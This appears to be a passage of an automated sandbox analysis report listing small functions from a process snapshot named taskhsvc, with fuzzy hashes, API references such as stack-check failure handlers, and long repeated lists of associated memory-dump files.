Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: abort$__stack_chk_fail_unlinkfclosestrerror
String ID:
API String ID: 2206734371-0
Opcode ID: fbf8f5d42927a172bb3ac681181dbaeb4b57767947fe654b2e382a945af12843
Instruction ID: e866b324cf76fd5de6ab690fc7fcfea07b853e387c724e686518999a93aa3601
Opcode Fuzzy Hash: fbf8f5d42927a172bb3ac681181dbaeb4b57767947fe654b2e382a945af12843
Instruction Fuzzy Hash: AEE0BF74D042099BCF00EFB9C54565EB7F0EB48304F458414D954E7315D234A9169F91

Uniqueness

Uniqueness Score: -1.00%

Function 00DC35CE Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

Part of subcall function 00DB8860: abort.MSVCRT ref: 00DB88CA
Part of subcall function 00DB8860: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00DB9EDC), ref: 00DB88DD

Part of subcall function 00DE63FA: abort.MSVCRT ref: 00DE6451

__stack_chk_fail.LIBSSP-0 ref: 00DC36AB

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabort
String ID:
API String ID: 3276312271-0
Opcode ID: e6cab785fabfd525b23bdac3de4cc2c1611c75d30247c8243b6855b73d375a6c
Instruction ID: 524246d12de43e35f28f3a68b9c64852ad7b2e470134dc8e3c666f4fa5c8ca5d
Opcode Fuzzy Hash: e6cab785fabfd525b23bdac3de4cc2c1611c75d30247c8243b6855b73d375a6c
Instruction Fuzzy Hash: C7D04C74A04645DBCB04EF74C5829ADB7E0EF48304F55881D948697345DA349501AB65

Uniqueness

Uniqueness Score: -1.00%

Function 00D915AB Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00D915D7

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: 53a9573b6e861910f207cdc129a8abe8a0e530318ff45e72081487cea71d347d
Instruction ID: 86b1044e59b32936114efd570569399c93d43520398234dafc0b47dc2c5d01e2
Opcode Fuzzy Hash: 53a9573b6e861910f207cdc129a8abe8a0e530318ff45e72081487cea71d347d
Instruction Fuzzy Hash: A2D062781086028BDB50DF24C58571A7AF09BC839CF1B4E1DE046A6565C274D586DA56

Uniqueness

Uniqueness Score: -1.00%

Function 00D9A876 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

Part of subcall function 00E9E1A9: __stack_chk_fail.LIBSSP-0 ref: 00E9E1D3

__stack_chk_fail.LIBSSP-0 ref: 00D9A93D

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: fa1323aaa5d1d9c4f920596bbf1ffec13d0d3778f37420305ba20013b7a3ba45
Instruction ID: 5bf55786530c09e46dd310daa69385bb0a356f7e706fbd15338a9c3384ccc551
Opcode Fuzzy Hash: fa1323aaa5d1d9c4f920596bbf1ffec13d0d3778f37420305ba20013b7a3ba45
Instruction Fuzzy Hash: 7FD01771A04007ABCF00EFA4D44266EB3B0EF44304F558448A2446620AC634A9029FB2

Uniqueness

Uniqueness Score: -1.00%

Function 00DC095F Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00DC0D39

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: 6bcfd30dc8c93249c03e557d7ffb09301bf811eb9a9d76fcb78e28bf5624843b
Instruction ID: 1d8cbed06b9166f3459f1a88aa20f2630903d1cca80ad56a591432a74f48635d
Opcode Fuzzy Hash: 6bcfd30dc8c93249c03e557d7ffb09301bf811eb9a9d76fcb78e28bf5624843b
Instruction Fuzzy Hash: 95D05E71908106DBDB00ABA4D042AA8F7B0EB04324F04440ED05A57684C6357440DA21

Uniqueness

Uniqueness Score: -1.00%

Function 00D96215 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00D963EC

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
